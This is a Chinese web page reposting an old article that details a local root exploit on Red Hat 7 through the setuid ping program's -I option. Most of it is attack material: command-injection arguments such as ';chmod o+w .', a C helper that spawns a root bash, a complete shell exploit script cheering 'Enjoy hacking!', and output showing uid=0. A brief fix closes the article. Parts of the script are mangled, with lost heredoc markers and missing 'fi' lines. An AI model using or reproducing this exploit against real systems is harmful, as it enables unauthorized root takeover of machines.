当前位置: 王朝网络 >> other >> redhat7本地利用ping拿root漏洞详析

redhat7本地利用ping拿root漏洞详析

王朝other·作者佚名 2008-05-19

窄屏简体版字體: 小|中|大|超大

作者: 大鹰

首先声明，本人及本人所在公司盖不对利用此漏洞所造成的损失负责。攻击代码不长，可以用shell或

perl来编写，推荐用shell写。

原理：

也许是redhat7的重大漏洞吧，他的ping程序的-I参数指定interface时通过modprobe和insmod执行任意代

码，大家都知道ping程序的权位是这样的：

[Hello!sune4gle]$ ls -l /bin/ping

-rwsr-xr-x 1 root root 20604 Aug 8 2000 /bin/ping

ping程序调用了raw_socket的所有setuid位，呵呵，我们可以通过用ping的-I参数来ping一个不存在的ip

，当然ip前面的参数是关键，也就是我们的执行命令，s权位令我们以普通权限的uid来运行ping时的euid

为0，所以实际上我们在运行ping的一瞬间是以超级拥护的权限在执行命令的。这样如果我们运行如下的

命令的话：

[Hello!sune4gle]$ping -I ';chmod o+w .' 195.117.3.59 &/dev/null

就是把当前目录对其他用户可写了，呵呵，当然我们可以利用sleep语句来使该进程等待，利用等待的时

间我们可以写一个c程序，让他编译并且运行：

cat /x.c

main() {

setuid(0); seteuid(0);

system("chmod 755 /;rm -f /x; rm -f /x.c");

execl("/bin/bash","bash","-i",0);

}

_eof_

gcc /x.c -o /x

chmod 755 /x

到这里大家应该都明白了吧？呵呵在/下创建x.c文件，并且编译，使它也拥有s权位，呵呵就使一个

setuid的rootshell啦，以下是写好的攻击代码：

#!/bin/sh

echo

echo "RedHat 7.0 exploit"

echo

echo "Enjoy hacking! :)"

echo

PING=/bin/ping

test -u $PING || PING=/bin/ping

if [ ! -u $PING ]; then

echo "Sorry, no setuid ping."

exit 0

echo "Phase 1: making / world-writable..."

$PING -I ';chmod o+w .' 195.117.3.59 &/dev/null

sleep 1

echo "Phase 2: compiling helper program in /..."

cat /x.c

main() {

setuid(0); seteuid(0);

system("chmod 755 /;rm -f /x; rm -f /x.c");

execl("/bin/bash","bash","-i",0);

}

_eof_

gcc /x.c -o /x

chmod 755 /x

echo "Phase 3: chown+chmod on our helper program..."

$PING -I ';chown 0 x' 202.102.3.1 &/dev/null

sleep 1

$PING -I ';chmod +s x' 202.101.23.1 &/dev/null

sleep 1

if [ ! -u /x ]; then

echo "Apparently, this is not exploitable on this system :("

exit 1

echo "Ye! Entering rootshell..."

echo "Thank you."

哈哈，好，我把这个shell程序在redhat7下的运行测试结果贴出来：

首先我得有个普通帐户，嘿嘿

[Hello!sune4gle]$ ./getroot.sh

RedHat 7.0 exploit

Enjoy hacking!

Phase 1: making / world-writable...

Phase 2: compiling helper program in /...

Phase 3: chown+chmod on our helper program...

Ye! Entering rootshell...

[Hello!root]# id

uid=0(root) gid=500(sune4gle) groups=500(sune4gle)

[Hello!root]#

攻击后的log:

Feb 24 11:16:27 sune4gle modprobe: modprobe: insmod ;chmod o+w . failed

Feb 24 11:16:30 sune4gle modprobe: modprobe: insmod ;chown 0 x failed

Feb 24 11:16:31 sune4gle modprobe: modprobe: insmod ;chmod +s x failed

解决方法：

去掉或限制ping程序的setuid位

[Hello!sune4gle]# chmod 655 /bin/ping

点击展开全文

上一篇：LVS分析（上）

下一篇：LIlo的介绍大家一起来学

免责声明：本文为网络用户发布，其观点仅代表作者个人观点，与本站无关，本站仅提供信息存储服务。文中陈述内容未经本站证实，其真实性、完整性、及时性本站不作任何保证或承诺，请读者仅作参考，并请自行核实相关内容。

没有找到您想要的？点此查看更多相关文章
相关文章▶

2023年上半年GDP全球前十五强
百态 2023-10-24

美众议院议长启动对拜登的弹劾调查
百态 2023-09-13

上海、济南、武汉等多地出现不明坠落物
探索 2023-09-06

印度或要将国名改为“巴拉特”
百态 2023-09-06

男子为女友送行，买票不登机被捕
百态 2023-08-20

手机地震预警功能怎么开？
干货 2023-08-06

女子4年卖2套房花700多万做美容：不但没变美脸，面部还出现变形
百态 2023-08-04

住户一楼被水淹还冲来8头猪
百态 2023-07-31

女子体内爬出大量瓜子状活虫
百态 2023-07-25

地球连续35年收到神秘规律性信号，网友：不要回答！
探索 2023-07-21

全球镓价格本周大涨27%
探索 2023-07-09

钱都流向了那些不缺钱的人，苦都留给了能吃苦的人
探索 2023-07-02

倩女手游刀客魅者强控制（强混乱强眩晕强睡眠）和对应控制抗性的关系
百态 2020-08-20

美国5月9日最新疫情：美国确诊人数突破131万
百态 2020-05-09

荷兰政府宣布将集体辞职
干货 2020-04-30

倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观：鹏程万里
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案神机营：射石饮羽
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山：拔刀相助
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案天工阁：鬼斧神工
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道：单枪匹马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：与虎谋皮
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：李代桃僵
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野：指鹿为马
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：小鸟依人
干货 2019-11-12

倩女幽魂手游师徒任务情义春秋猜成语答案金陵：千金买邻
干货 2019-11-12